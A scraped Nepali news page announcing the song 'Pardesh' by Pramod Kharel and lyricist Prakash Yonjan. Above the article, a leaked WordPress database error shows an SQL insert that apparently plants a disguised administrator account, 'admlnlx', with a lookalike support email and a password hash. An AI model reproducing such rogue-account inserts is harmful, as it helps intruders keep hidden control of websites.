WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BDTY4BX5cAtcg62Mqm5zapd92fWwtp0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-27 21:34:05', '', 'admlnlx', 'admlnlx')

प्रमोद खरेलको स्वरमा गीतकार प्रकाश योन्जनको ‘परदेश’ बोलको गीत बजारमा – Gaule Khabar

प्रमोद खरेलको स्वरमा गीतकार प्रकाश योन्जनको ‘परदेश’ बोलको गीत बजारमा

प्रमोद खरेलको स्वरमा गीतकार प्रकाश योन्जनको ‘परदेश’ बोलको गीत बजारमा

काठमाडौँ । प्रमोद खरेलको स्वरमा गीतकार प्रकाश योन्जनको ‘परदेश’ बोलको गीत बजारमा आएको छ । सिन्धुपाल्चोक निवासी योन्जनले आफ्नो सांगीतिक कोशेली पस्किने क्रममा ‘परदेशी’ बोलको गीत बजारमा ल्याएको हो ।

उनी आफ्नो गीत दर्शकले मन पराउनेमा विश्वस्त रहेको बताए । गीतकार योन्जन ञआमालाई चाहियो रे’ बोलको गीतबाट सांगीतिक क्षेत्रमा प्रवेश गरेका हुन ।

सार्वजानिक भएको ‘परदेश’ गीतलाई गीतकार प्रकाश योन्जनले लेखेका हुन भने, टिका बम्जनले संगीत गरेका हुन । पवन लामाले संगीत संयोजन गरेको गीतलाई गायक प्रमोद खरेलले गाएका हुन ।

उमेश गुरुङ्ले निर्देशन, कमला अमगाइले निर्माण, सम्भु चालिसेले भिडियोलाई छायांकन गरेका हुन । भिडियोमा महेश खड्का, उशा सुवेदी, लोकेश का एम भा र प्रशुना केसीको अभिनय समेटिएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका